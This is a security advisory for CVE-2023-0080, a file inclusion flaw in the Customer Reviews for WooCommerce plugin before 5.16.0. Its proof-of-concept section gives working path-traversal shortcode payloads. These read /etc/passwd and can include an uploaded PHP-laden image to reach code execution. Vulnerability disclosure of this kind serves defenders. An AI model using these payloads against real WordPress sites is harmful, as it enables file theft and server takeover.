Customer Reviews for WooCommerce < 5.16.0 – Contributor+ LFI | CVE 2023-0080

Description

The plugin does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.

Proof of Concept

Note:
- The “Enable shortcodes and Gutenberg blocks” in Reviews Settings needs to be enabled. You can find this setting in the Shortcode tab (/wp-admin/admin.php?page=cr-reviews-settings&tab=shortcodes)

As a contributor, put the shortcode below in a post and preview it

[cusrev_reviews comment_file="/../../../license.txt"]

Assuming the blog is at /var/www/wordpress/, /etc/passwd can be accessed with

[cusrev_reviews comment_file="/../../../../../../etc/passwd"]

If the attacker can upload any file, such as an image containing PHP code in the comment, RCE could be achieved, example (by default, author and above can upload files):

[cusrev_reviews comment_file="/../../../wp-content/uploads/2023/01/malicious.jpg"]